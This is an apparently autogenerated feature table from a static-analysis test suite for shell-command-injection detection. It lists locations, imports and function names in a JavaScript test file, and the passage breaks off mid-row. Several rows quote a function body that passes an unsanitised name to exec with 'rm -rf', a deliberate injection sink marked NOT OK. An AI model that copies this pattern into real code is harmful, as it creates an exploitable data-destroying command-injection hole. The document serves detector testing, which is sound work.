autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | exceptional return of function cla2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | function cla2() { } | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | function cla2() { } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | function cla2() { } | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | return of function cla2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | return of function cla2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | return of function cla2 | enclosingFunctionName | cla2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:1:25:19 | return of function cla2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:10:25:13 | cla2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:10:25:13 | cla2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:10:25:13 | cla2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:10:25:13 | cla2 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:10:25:13 | cla2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:25:10:25:13 | cla2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:26:4 | cla2 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:26:4 | cla2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:26:4 | cla2 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:26:14 | cla2.prototype | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:26:14 | cla2.prototype | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:26:14 | cla2.prototype | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:26:21 | cla2.pr ... .method | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:26:21 | cla2.pr ... .method | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:26:21 | cla2.pr ... .method | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:28:1 | cla2.pr ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:28:1 | cla2.pr ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:1:28:1 | cla2.pr ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:6:26:14 | prototype | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:6:26:14 | prototype | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:6:26:14 | prototype | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:16:26:21 | method | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:16:26:21 | method | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:16:26:21 | method | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:26:24 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:26:24 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:26:24 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:26:24 | cp | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:26:24 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:26:24 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:26:24 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:26:24 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:26:24 | this | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:26:24 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | 'arguments' object of anonymous function | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | exceptional return of anonymous function | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | functio ... OT OK\\n} | assignedToPropName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | functio ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | functio ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | return of anonymous function | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:25:28:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:35:26:38 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:26:35:26:38 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 